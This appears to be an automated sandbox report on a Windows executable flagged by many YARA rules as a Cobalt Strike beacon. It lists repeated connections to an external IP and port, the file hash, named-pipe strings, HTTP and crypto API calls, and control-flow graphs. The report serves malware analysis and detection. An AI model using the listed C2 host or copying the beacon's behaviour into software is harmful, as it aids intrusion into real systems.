                      Dec 26, 2024 19:31:33.848685026 CET5008360421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:33.969029903 CET6042150082152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:33.969043016 CET6042150083152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:33.969125032 CET5008360421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:33.969296932 CET5008360421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:34.092747927 CET5008460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:34.093858004 CET6042150083152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:34.093924999 CET5008360421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:34.213227987 CET6042150084152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:34.213304043 CET5008460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:34.213939905 CET5008460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:34.333492041 CET6042150084152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:36.927376986 CET6042150084152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:36.927589893 CET5008460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:36.927670956 CET5008460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:36.929544926 CET5008560421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:37.047439098 CET6042150084152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:37.049271107 CET6042150085152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:37.049406052 CET5008560421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:37.049853086 CET5008560421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:37.169433117 CET6042150085152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:39.709429979 CET6042150085152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:39.709512949 CET5008560421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:39.709583044 CET5008560421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:39.710556984 CET5008660421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:39.829154015 CET6042150085152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:39.830018044 CET6042150086152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:39.830105066 CET5008660421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:39.830271006 CET5008660421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:39.950159073 CET6042150086152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:39.950223923 CET5008660421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:39.959573984 CET5008760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:40.079215050 CET6042150087152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:40.079287052 CET5008760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:40.079592943 CET5008760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:40.199258089 CET6042150087152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:42.740477085 CET6042150087152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:42.740586042 CET5008760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:42.757554054 CET5008760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:42.757559061 CET5008860421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:42.877315044 CET6042150087152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:42.877332926 CET6042150088152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:42.878153086 CET5008860421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:42.878153086 CET5008860421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:42.997911930 CET6042150088152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:45.536788940 CET6042150088152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:45.537683010 CET5008860421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:45.537683010 CET5008860421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:45.545841932 CET5008960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:45.661514997 CET6042150088152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:45.669187069 CET6042150089152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:45.669745922 CET5008960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:45.669745922 CET5008960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:45.789937973 CET6042150089152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:45.790005922 CET5008960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:45.814285040 CET5009060421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:45.933875084 CET6042150090152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:45.933950901 CET5009060421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:45.934499025 CET5009060421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:46.053988934 CET6042150090152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:48.599570990 CET6042150090152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:48.599639893 CET5009060421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:48.599781036 CET5009060421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:48.600537062 CET5009160421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:48.719388008 CET6042150090152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:48.720154047 CET6042150091152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:48.720670938 CET5009160421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:48.720670938 CET5009160421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:48.840255976 CET6042150091152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:51.390285969 CET6042150091152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:51.390562057 CET5009160421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:51.390631914 CET5009160421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:51.391331911 CET5009260421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:51.510675907 CET6042150091152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:51.511192083 CET6042150092152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:51.511333942 CET5009260421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:51.511517048 CET5009260421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:51.631330967 CET6042150092152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:51.631378889 CET6042150092152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:51.631443977 CET5009260421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:51.637717962 CET5009360421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:51.956990957 CET6042150093152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:51.957125902 CET5009360421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:51.957540989 CET5009360421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:52.077022076 CET6042150093152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:54.637913942 CET6042150093152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:54.641776085 CET5009360421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:54.641836882 CET5009360421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:54.642388105 CET5009460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:54.761456013 CET6042150093152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:54.761912107 CET6042150094152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:54.762020111 CET5009460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:54.762747049 CET5009460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:54.882253885 CET6042150094152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:57.486073017 CET6042150094152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:57.486140966 CET5009460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:57.486217022 CET5009460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:57.486892939 CET5009560421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:57.606386900 CET6042150094152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:57.607075930 CET6042150095152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:57.607151985 CET5009560421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:57.607409954 CET5009560421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:57.716885090 CET5009660421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:57.727384090 CET6042150095152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:57.727462053 CET6042150095152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:57.727544069 CET5009560421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:57.836455107 CET6042150096152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:57.840156078 CET5009660421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:57.840156078 CET5009660421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:57.959810972 CET6042150096152.42.226.16192.168.2.5
                      Dec 26, 2024 19:32:00.490613937 CET6042150096152.42.226.16192.168.2.5
                      Dec 26, 2024 19:32:00.493645906 CET5009660421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:32:00.493732929 CET5009660421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:32:00.497579098 CET5009760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:32:00.614027977 CET6042150096152.42.226.16192.168.2.5
                      Dec 26, 2024 19:32:00.617640018 CET6042150097152.42.226.16192.168.2.5
                      Dec 26, 2024 19:32:00.621993065 CET5009760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:32:00.621993065 CET5009760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:32:00.741863966 CET6042150097152.42.226.16192.168.2.5
                      Dec 26, 2024 19:32:03.287889004 CET6042150097152.42.226.16192.168.2.5
                      Dec 26, 2024 19:32:03.287961960 CET5009760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:32:03.288053989 CET5009760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:32:03.288810968 CET5009860421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:32:03.407668114 CET6042150097152.42.226.16192.168.2.5
                      Dec 26, 2024 19:32:03.408334970 CET6042150098152.42.226.16192.168.2.5
                      Dec 26, 2024 19:32:03.408488989 CET5009860421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:32:03.408626080 CET5009860421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:32:03.528512955 CET6042150098152.42.226.16192.168.2.5
                      Dec 26, 2024 19:32:03.528577089 CET5009860421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:32:03.529782057 CET5009960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:32:03.649765968 CET6042150099152.42.226.16192.168.2.5
                      Dec 26, 2024 19:32:03.649857998 CET5009960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:32:03.650333881 CET5009960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:32:03.770154953 CET6042150099152.42.226.16192.168.2.5
                      Dec 26, 2024 19:32:06.302364111 CET6042150099152.42.226.16192.168.2.5
                      Dec 26, 2024 19:32:06.302484989 CET5009960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:32:06.304622889 CET5009960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:32:06.424221992 CET6042150099152.42.226.16192.168.2.5

                      Click to jump to process

                      Click to jump to process

                      Target ID:0
                      Start time:13:27:57
                      Start date:26/12/2024
                      Path:C:\Users\user\Desktop\121.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Users\user\Desktop\121.exe"
                      Imagebase:0x400000
                      File size:328'704 bytes
                      MD5 hash:3B8F4AE6DD1EF9625F8BA8F6C9EB8515
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                      • Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                      • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                      • Rule: Beacon_K5om, Description: Detects Meterpreter Beacon - file K5om.dll, Source: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Author: Florian Roth
                      • Rule: CobaltStrike_Unmodifed_Beacon, Description: Detects unmodified CobaltStrike beacon DLL, Source: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Author: yara@s3c.za.net
                      • Rule: Leviathan_CobaltStrike_Sample_1, Description: Detects Cobalt Strike sample from Leviathan report, Source: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Author: Florian Roth
                      • Rule: crime_win32_csbeacon_1, Description: Detects Cobalt Strike loader, Source: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Author: @VK_Intel
                      • Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Author: Florian Roth
                      • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Author: ditekSHen
                      • Rule: MALWARE_Win_CobaltStrike, Description: CobaltStrike payload, Source: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Author: ditekSHen
                      • Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                      • Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                      • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                      • Rule: Beacon_K5om, Description: Detects Meterpreter Beacon - file K5om.dll, Source: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                      • Rule: CobaltStrike_Unmodifed_Beacon, Description: Detects unmodified CobaltStrike beacon DLL, Source: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Author: yara@s3c.za.net
                      • Rule: Leviathan_CobaltStrike_Sample_1, Description: Detects Cobalt Strike sample from Leviathan report, Source: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                      • Rule: crime_win32_csbeacon_1, Description: Detects Cobalt Strike loader, Source: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Author: @VK_Intel
                      • Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                      • Rule: MALWARE_Win_CobaltStrike, Description: CobaltStrike payload, Source: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                      Reputation:low
                      Has exited:false

                        Execution Graph

                        Execution Coverage:1.9%
                        Dynamic/Decrypted Code Coverage:77.3%
                        Signature Coverage:10.3%
                        Total number of Nodes:321
                        Total number of Limit Nodes:18

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 10 401180-4011ae 11 401460-401463 GetStartupInfoA 10->11 12 4011b4-4011d1 10->12 16 401470-40148a call 402e88 11->16 13 4011e9-4011f4 12->13 14 4011f6-401204 13->14 15 4011d8-4011db 13->15 19 401417-401426 call 402e90 14->19 20 40120a-40120e 14->20 17 401400-401411 15->17 18 4011e1-4011e6 Sleep 15->18 17->19 17->20 18->13 27 401229-40122b 19->27 28 40142c-401447 _initterm 19->28 23 401490-4014a9 call 402e80 20->23 24 401214-401223 20->24 35 4014ae-4014b6 call 402e60 23->35 24->27 24->28 30 401231-40123e 27->30 31 40144d-401452 27->31 28->30 28->31 33 401240-401248 30->33 34 40124c-401299 call 401fd0 SetUnhandledExceptionFilter call 4024e0 call 402ef0 call 401d40 call 402f00 30->34 31->30 33->34 48 4012b2-4012b8 34->48 49 40129b 34->49 51 4012a0-4012a2 48->51 52 4012ba-4012c8 48->52 50 4012f0-4012f6 49->50 53 4012f8-401302 50->53 54 40130e-401333 malloc 50->54 55 4012a4-4012a7 51->55 56 4012e9 51->56 57 4012ae 52->57 58 4013f0-4013f5 53->58 59 401308 53->59 60 401335-40133a 54->60 61 40137b-4013af call 401950 call 403040 54->61 62 4012d0-4012d2 55->62 63 4012a9 55->63 56->50 57->48 58->59 59->54 64 401340-401374 strlen malloc memcpy 60->64 72 4013b4-4013c2 61->72 62->56 66 4012d4 62->66 63->57 64->64 68 401376 64->68 67 4012d8-4012e2 66->67 67->56 70 4012e4-4012e7 67->70 68->61 70->56 70->67 72->35 73 4013c8-4013d0 72->73 73->16 74 4013d6-4013e5 73->74
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4496158891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4496143153.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496278416.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496347460.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496397983.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496523657.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496645300.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_121.jbxd
                        Similarity
                        • API ID: malloc$ExceptionFilterInfoSleepStartupUnhandledmemcpystrlen
                        • String ID: 0PE$@6E$DCE
                        • API String ID: 649803965-2430247936
                        • Opcode ID: 51392e7461e9e07ed7f19d0721189c0bf25b9227d41394980ff0e93a3bc1fca1
                        • Instruction ID: 7b6093c48930a8ef89593839c944e9f908a2e32032a5f35aeb8b435f34b377a6
                        • Opcode Fuzzy Hash: 51392e7461e9e07ed7f19d0721189c0bf25b9227d41394980ff0e93a3bc1fca1
                        • Instruction Fuzzy Hash: 5C71ADB5601B0486EB259F56E89476A33A1B745BCAF84803BEF49673E6DF7CC844C348

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 75 cee68c-cee75a call cff530 * 2 call cf83d0 call cff63c call cfb454 call cf7b38 88 cee75c-cee78b call cf2d70 call cf2c0c 75->88 89 cee790-cee799 75->89 88->89 91 cee79c-cee7a3 89->91 91->91 93 cee7a5-cee7b0 91->93 95 cee7c4-cee7d4 call cff63c 93->95 96 cee7b2-cee7c2 call cff63c 93->96 100 cee7d9-cee82e call cfb454 call d12570 call cee918 95->100 96->100 107 cee831-cee838 100->107 107->107 108 cee83a-cee868 call d12580 call cf83c4 call ceefbc 107->108 115 cee86a-cee882 call d12550 108->115 116 cee895-cee898 call d12540 108->116 115->116 122 cee884-cee88d 115->122 119 cee89e 116->119 121 cee8a0-cee8bb 119->121 122->116 123 cee88f-cee891 122->123 124 cee8bc-cee8bf 123->124 125 cee893 123->125 124->116 126 cee8c1-cee8dc call d12538 124->126 125->116 129 cee8de-cee8e4 126->129 130 cee8ed-cee8f0 126->130 129->130 131 cee8e6-cee8eb 129->131 130->116 132 cee8f2-cee916 call d12540 call cfb454 call cf846c 130->132 131->126 131->130 132->121
                        APIs
                        • _snprintf.LIBCMT ref: 00CEE725
                          • Part of subcall function 00CFF63C: _errno.LIBCMT ref: 00CFF673
                          • Part of subcall function 00CFF63C: _invalid_parameter_noinfo.LIBCMT ref: 00CFF67E
                          • Part of subcall function 00CF7B38: _snprintf.LIBCMT ref: 00CF7CA5
                        • _snprintf.LIBCMT ref: 00CEE7BD
                        • _snprintf.LIBCMT ref: 00CEE7D4
                        • HttpOpenRequestA.WININET ref: 00CEE818
                        • HttpSendRequestA.WININET ref: 00CEE84A
                        • InternetQueryDataAvailable.WININET ref: 00CEE87A
                        • InternetCloseHandle.WININET ref: 00CEE898
                          • Part of subcall function 00CF2D70: strchr.LIBCMT ref: 00CF2DD6
                          • Part of subcall function 00CF2D70: _snprintf.LIBCMT ref: 00CF2E0C
                          • Part of subcall function 00CF2C0C: strchr.LIBCMT ref: 00CF2C69
                          • Part of subcall function 00CF2C0C: _snprintf.LIBCMT ref: 00CF2CB3
                        • InternetReadFile.WININET ref: 00CEE8D4
                        • InternetCloseHandle.WININET ref: 00CEE8F5
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _snprintf$Internet$CloseHandleHttpRequeststrchr$AvailableDataFileOpenQueryReadSend_errno_invalid_parameter_noinfo
                        • String ID: %s%s$*/*
                        • API String ID: 3536628738-856325523
                        • Opcode ID: 5c4b2c5719e067ce629add7012f112fb417b911470ce534f4123a2ba84123eb0
                        • Instruction ID: 3c33c4bdd10bf315787bcc3b60fd5b053ff34e91b01ee815575f0990f3dba3b2
                        • Opcode Fuzzy Hash: 5c4b2c5719e067ce629add7012f112fb417b911470ce534f4123a2ba84123eb0
                        • Instruction Fuzzy Hash: B961C032700AC496EB10DFA6E4907AEB7A5F784BD8F400126EE4D57B98DF38C50AC710

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: Name$ComputerFileModuleUserVersion_snprintfmallocstrrchr
                        • String ID: %s%s%s
                        • API String ID: 1671524875-1891519693
                        • Opcode ID: 40ae984fd8d1d60e03acc18bee9c81741f4638c9dfd0547d5b2d8a001e524837
                        • Instruction ID: ba1005f0a257a5623b157b22ee465aba6d2e42968e23a24454a40abcfc7ff958
                        • Opcode Fuzzy Hash: 40ae984fd8d1d60e03acc18bee9c81741f4638c9dfd0547d5b2d8a001e524837
                        • Instruction Fuzzy Hash: 7641D03470468446EA08FB63A8147BFA791BB89FD0F484125BF560BB6ACF3CC142C700

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 184 ce1184-ce11c0 CryptAcquireContextA 185 ce11e6-ce11f9 CryptGenRandom 184->185 186 ce11c2-ce11e4 CryptAcquireContextA 184->186 188 ce11fd-ce120a CryptReleaseContext 185->188 189 ce11fb 185->189 186->185 187 ce120c-ce1216 186->187 188->187 189->188
                        APIs
                        • CryptAcquireContextA.ADVAPI32 ref: 00CE11B8
                        • CryptAcquireContextA.ADVAPI32 ref: 00CE11DC
                        • CryptGenRandom.ADVAPI32 ref: 00CE11F0
                        • CryptReleaseContext.ADVAPI32 ref: 00CE1204
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: Crypt$Context$Acquire$RandomRelease
                        • String ID: ($Microsoft Base Cryptographic Provider v1.0
                        • API String ID: 685801729-4046902070
                        • Opcode ID: 0f7b575704e2efa4e71594adee21552c9336b074ba1ad3f512173577c0e57d68
                        • Instruction ID: 03d214cb8547c24239f498d5041069a6b72171af34762df9bbd8d6b2ca2ea671
                        • Opcode Fuzzy Hash: 0f7b575704e2efa4e71594adee21552c9336b074ba1ad3f512173577c0e57d68
                        • Instruction Fuzzy Hash: E301887570074092E710CFA6E8887A9B772F7DCB84F488526DB5983764CF78C659C750

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 408 401630-40168d CreateNamedPipeA 409 4016dc-4016e5 408->409 410 40168f-4016a1 ConnectNamedPipe 408->410 410->409 411 4016a3-4016a5 410->411 412 4016c6-4016cf CloseHandle 411->412 413 4016a7-4016c4 WriteFile 411->413 412->409 413->412 414 4016d1-4016da 413->414 414->411
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4496158891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4496143153.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496278416.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496347460.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496397983.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496523657.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496645300.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_121.jbxd
                        Similarity
                        • API ID: NamedPipe$CloseConnectCreateFileHandleWrite
                        • String ID:
                        • API String ID: 2239253087-0
                        • Opcode ID: a137092020d99df8e6f9d9be70b23b42cb61a637a040608a59e494d996c8cf1e
                        • Instruction ID: 33ab9d0585ac1679f1025b945fed68b18b66da774309cd2c41c4043231b0423c
                        • Opcode Fuzzy Hash: a137092020d99df8e6f9d9be70b23b42cb61a637a040608a59e494d996c8cf1e
                        • Instruction Fuzzy Hash: 431182A1714A5047E7208B12EC4870AB660B785BEAF548635EE5D1BBE4DB7DC445CB08

                        Control-flow Graph

                        APIs
                        • malloc.MSVCRT ref: 004017B9
                        • SleepEx.KERNELBASE ref: 004017CD
                          • Part of subcall function 00401704: CreateFileA.KERNEL32 ref: 0040174D
                          • Part of subcall function 00401704: ReadFile.KERNEL32 ref: 00401777
                          • Part of subcall function 00401704: CloseHandle.KERNEL32 ref: 00401784
                        • GetTickCount.KERNEL32 ref: 004017FC
                        • CreateThread.KERNEL32 ref: 00401885
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4496158891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4496143153.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496278416.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496347460.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496397983.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496523657.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4496645300.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_121.jbxd
                        Similarity
                        • API ID: CreateFile$CloseCountHandleReadSleepThreadTickmalloc
                        • String ID: @@$%c%c%c%c%c%c%c%c%cMSSE-%d-server$.$\$\$e$i$p$p
                        • API String ID: 3660650057-1020837823
                        • Opcode ID: 66b9071a1fbc2149318147bf2399a6e6d29a638d527e23c28c2dfbdbcde83963
